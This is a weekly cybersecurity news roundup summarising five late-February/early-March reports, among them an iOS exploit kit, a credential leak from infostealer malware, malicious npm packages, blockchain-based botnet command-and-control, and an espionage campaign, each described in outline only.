Weekly Summary Cyberattacks 26 feb-04 march

Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit  

Researchers from Google Threat Intelligence Group (GTIG) disclosed the discovery of Coruna, a sophisticated iOS exploit kit targeting Apple iPhones running iOS versions 13.0 through 17.2.1. The exploit kit contains five complete iOS exploit chains and a total of 23 exploits, making it one of the most comprehensive collections of iOS exploitation techniques observed in the wild. Some of the exploits rely on non-public exploitation techniques and mitigation bypasses, highlighting a high level of technical sophistication. The exploit chain was delivered through a previously unseen JavaScript exploitation framework that used obfuscation techniques to encode strings and integers. 

Infostealer list of 8.29 million identifiers linked to websites including more than 194,000 French  

Researchers monitoring cybercrime activity have identified a massive collection of stolen login credentials compiled from infostealer malware infections, totaling approximately 8.29 million username-password pairs. The dataset links each credential directly to the corresponding login portal, providing a ready-to-use blueprint for automated attack tools to target specific web services. The breach snapshot highlights a significant concentration of French internet accounts, over 194 000 .fr-domain credentials are included, dwarfing other regional domains such as .ca, .be, .ch, and .lu. 

North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT  

Security researchers revealed that threat actors linked to North Korea published 26 malicious packages to the npm registry as part of an ongoing supply chain campaign. The packages were disguised as legitimate developer utilities, increasing the likelihood that unsuspecting developers would download and integrate them into projects. This activity has been associated with the broader “Contagious Interview” campaign, which previously targeted developers through social engineering and malicious coding assignments. The malicious packages execute during installation and initiate contact with Pastebin to retrieve hidden command-and-control (C2) infrastructure. Instead of directly embedding malicious domains, the attackers used steganography techniques to conceal C2 addresses within seemingly benign Pastebin content. Once decoded, the malware downloads additional payloads tailored to the victim’s operating system, enabling cross-platform functionality.

Aeternum Botnet Shifts Command Control to Polygon Blockchain  

Cybersecurity researchers describe the Aeternum C2 botnet loader, a novel piece of malware that uses the Polygon public blockchain as its primary command-and-control (C2) infrastructure. This approach represents a departure from conventional botnet architectures that rely on static command servers, domains, or centralized infrastructure. Instead, Aeternum operators publish encrypted instructions directly to smart contracts on the Polygon chain, which infected hosts then poll via standard remote procedure call (RPC) endpoints to retrieve commands. This effectively makes the botnet’s C2 layer immutable and highly resistant to traditional takedown efforts, as historical blockchain transactions cannot be altered or removed by law enforcement or defenders. 

GRIDTIDE: Global Cyber Espionage Campaign  

Google Threat Intelligence Group (GTIG), in collaboration with Mandiant and other industry partners, publicly disclosed and acted to disrupt a global cyber espionage campaign attributed to a threat actor tracked as UNC2814. This long-running operation, known internally as GRIDTIDE, targeted telecommunications providers and government organizations in at least 42. While the campaign exploited no specific product vulnerability, it exhibited a high degree of stealth by abusing legitimate cloud infrastructure and SaaS APIs for command-and-control (C2), allowing malicious traffic to blend with normal enterprise workflows and evade traditional detection.